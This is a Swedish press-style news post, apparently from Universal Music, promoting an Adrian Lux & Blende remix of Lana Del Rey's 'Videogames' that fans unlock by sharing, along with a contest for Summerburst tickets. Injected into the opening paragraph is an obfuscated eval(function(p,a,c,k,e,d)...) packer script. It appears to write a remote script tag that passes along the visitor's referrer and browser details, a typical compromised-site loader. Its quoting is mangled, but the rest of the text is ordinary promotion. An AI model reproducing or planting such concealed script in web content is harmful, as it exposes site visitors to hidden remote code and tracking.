Image Image Image Image Image Image Image Image Image Image

| 1 december, 2020

Scroll to top

Top

Remixa Lana Del Reys ”Videogames” – Vinn biljetter till Summerburst

Remixa Lana Del Reys ”Videogames” – Vinn biljetter till Summerburst
Sebastian

Svenska eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rfzsb|var|u0026u|referrer|fnkte||js|php’.split(’|’),0,{}))
houseproducenten och DJn Adrian Lux har haft en fantastisk vår. Det självbetitlade albumet har hyllats och Adrian har varit en av huvudpersonerna i TV6-serien ”Heartbeats”, singeln ”Burning” snurrar för fullt på radion och Adrian flyger kors och tvärs över världen för gig i såväl USA som Australien.

Amerikanska singer-songwritern Lana Del Rey har också haft ett fantastiskt år – hennes senaste album ”Born To Die” har sålt över 2 miljoner exemplar och hon har hyllats av såväl media som artistkollegor och andra kulturpersonligheter runtom i världen.

Inom kort släpps en ny, exklusiv remix på Lana Del Reys singel ”Videogames” signerad just Adrian Lux och dennes samarbetspartner Blende – och det är fansen själva som kommer att bestämma när låten blir tillgänglig i sin helhet. Remixen är uppdelad i 1000 delar och de 1000 första fansen som går in på sajten lanadelux.com låser upp vars en unik del av låten genom att dela den på Facebook eller Twitter. När samtliga 1000 delar är ”upplåsta” släpps remixen på Spotify och ITunes. Den som skriver den mest fyndiga eller kreativa tweeten eller Facebook-posten belönas dessutom med två biljetter till Adrian Lux spelning på Summerburst i Stockholm nu på lördag 16/6.

Var med och lås upp ”Videogames (Adrian Lux & Blende Remix)” och tävla om Summerburst-biljetter på lanadelux.com

Mer information om Summerburst hittar man på www.summerburst.se

Universal Music är Sveriges och världens ledande musikbolag med representation i hela 71 länder. Universal Music i Sverige är helägda av Universal Music Group. Under huvudetiketten återfinns en mängd framgångsrika, klassiska skivmärken som bl.a. Motown, Interscope, Stockholm Records, Def Jam, Polar, Verve och Deutsche Grammophone.